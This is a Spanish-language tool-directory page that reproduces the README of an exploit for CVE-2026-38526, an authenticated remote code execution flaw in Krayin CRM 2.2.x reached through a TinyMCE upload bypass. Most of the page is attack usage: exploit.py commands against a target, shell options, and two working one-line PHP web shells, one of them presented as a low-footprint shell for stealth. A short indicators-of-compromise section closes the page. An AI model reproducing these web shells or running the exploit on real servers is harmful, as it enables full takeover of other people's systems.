Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — Exploit para CVE-2026-38526 en Krayin CRM v2.2.x - RCE autenticado mediante bypass de carga de archivos en TinyMCE. Incluye shell interactiva, payloads de múltiples tipos, generación automática de shell y verificación. Autor: Sudeepa Wanigarathna. Solo para pruebas autorizadas. | Kitploit
Herramientas/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingGeneración de Shellcode
GitHub
cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Exploit para CVE-2026-38526 en Krayin CRM v2.2.x - RCE autenticado mediante bypass de carga de archivos en TinyMCE. Incluye shell interactiva, payloads de múltiples tipos, generación automática de shell y verificación. Autor: Sudeepa Wanigarathna. Solo para pruebas autorizadas.

Ver Repositorio
318hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔓 Krayin CRM v2.2.x - Exploit de Ejecución Remota de Código Autenticado

License: MIT CVE-2026-38526

⚠️ SOLO PARA PRUEBAS DE SEGURIDAD AUTORIZADAS - El uso no autorizado es ilegal y poco ético.

📋 Resumen

Esta herramienta de explotación demuestra una vulnerabilidad crítica de ejecución remota de código (RCE) autenticada descubierta en Krayin CRM versión 2.2.x. La vulnerabilidad existe en la funcionalidad de carga de archivos de TinyMCE, que permite a administradores autenticados cargar y ejecutar código PHP arbitrario en el servidor.

PropiedadValor
ID CVECVE-2026-38526
Software afectadoKrayin CRM v2.2.x
Tipo de vulnerabilidadEjecución Remota de Código Autenticada (RCE)
Autenticación requeridaSí (Acceso a nivel de administrador)
ImpactoCompromiso completo del sistema
Puntuación CVSS8.8 (Alto)

🚨 Detalles de la Vulnerabilidad

La vulnerabilidad se origina por una validación insuficiente del tipo de archivo en el endpoint de carga de archivos de TinyMCE (/admin/tinymce/upload). Un administrador autenticado puede:

  • Cargar un archivo PHP disfrazado con un tipo MIME de imagen.
  • El archivo se almacena en una ubicación accesible desde la web.
  • El atacante puede entonces ejecutar código PHP arbitrario en el servidor.

Versiones Afectadas

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Todas las versiones 2.2.x anteriores al parche de lanzamiento

✨ Características

  • Múltiples tipos de shell: Básico, Avanzado, Mínimo, Administrador de Archivos y Personalizado.
  • Shell interactiva: Interfaz similar a terminal completa con historial de comandos.
  • Carga de archivos: Cargar archivos adicionales a través de la shell.
  • Extracción de token CSRF: Manejo automático de la protección CSRF.
  • Soporte de proxy: Enrutar tráfico a través de proxies HTTP/HTTPS.
  • Formatos de salida flexibles: Texto, JSON o modo Silencioso.
  • Lógica de reintento: Reintento automático en fallos de conexión.
  • Cabeceras personalizadas: Soporte para cabeceras HTTP personalizadas.
  • Modo detallado: Salida de depuración detallada.
  • Soporte SSL: Verificación opcional de certificados SSL.

📦 Instalación

Requisitos

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Instalación Rápida

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

Archivo de Requisitos (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Uso

Sintaxis Básica del Comando

python3 exploit.py -t <TARGET_URL> -u <USUARIO> -p <CONTRASEÑA> [OPCIONES]

Parámetros Requeridos

ParámetroDescripción
-t, --targetURL objetivo (ej., http://192.168.1.100)
-u, --usernameNombre de usuario o correo del administrador
-p, --passwordContraseña del administrador

Ejemplos de Uso Comunes

# Explotación básica con shell generada
python3 exploit.py -t http://target.com -u [email protected] -p password

# Cargar archivo PHP de shell personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generar shell avanzada con modo interactivo
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generar archivo de shell sin explotación
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Usar con proxy para pruebas/depuración
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Salida JSON para automatización
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modo detallado con tiempo de espera personalizado
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent y cabeceras personalizadas
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipos de Shell

  1. Shell Básica (basic) Ejecución simple de comandos con la función system().

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avanzada (advanced) Shell rica en funciones con:

    • Múltiples métodos de ejecución de comandos
    • Interfaz web tipo terminal atractiva
    • Soporte para historial de comandos
    • Visualización del usuario actual y nombre del host
  3. Shell Mínima (minimal) Huella mínima para sigilo.

    <?php system($_GET["cmd"]); ?>
    
  4. Administrador de Archivos (file_manager) Interfaz completa de gestión de archivos:

    • Carga de archivos
    • Eliminación de archivos
    • Creación de directorios
    • Navegación
    • Visualizador de permisos de archivos
  5. Shell Personalizada (custom) Usa tu propio archivo PHP de shell con el parámetro -f.

📝 Formatos de Salida

Formato Texto (Predeterminado)

Salida coloreada legible para humanos, adecuada para uso interactivo.

Formato JSON (-o json)

Formato legible por máquinas para automatización e integración.

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silencioso (-q, --quiet)

Sin salida excepto errores. Útil para procesamiento por lotes.

⚙️ Opciones Avanzadas

OpciónDescripciónPredeterminado
--timeoutTiempo de espera de solicitud en segundos30
--retryNúmero de intentos de reintento3
--retry-delayDemora entre reintentos en segundos2
--user-agentCadena User-Agent personalizadaUA de navegador predeterminado
--headerCabeceras HTTP personalizadas (Clave: Valor)Ninguna
--verify-sslVerificar certificados SSLFalso
--proxyURL de proxy HTTP/HTTPSNinguno
-v, --verboseHabilitar salida de depuraciónFalso
-q, --quietSuprimir toda la salidaFalso

Ejemplo de Cabeceras Personalizadas

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Detección y Prevención

Señales de Compromiso (IoC)

  • Archivos a Monitorear:

    • Archivos PHP inusuales en public/storage/upload/
    • Archivos con extensiones dobles (ej., image.php.jpg)
    • Archivos nuevos con nombres sospechosos
  • Registros a Revisar:

    • Solicitudes POST a /admin/tinymce/upload
    • Horarios de inicio de sesión de administradores inusuales
    • Intentos fallidos de autenticación
Descargar herramienta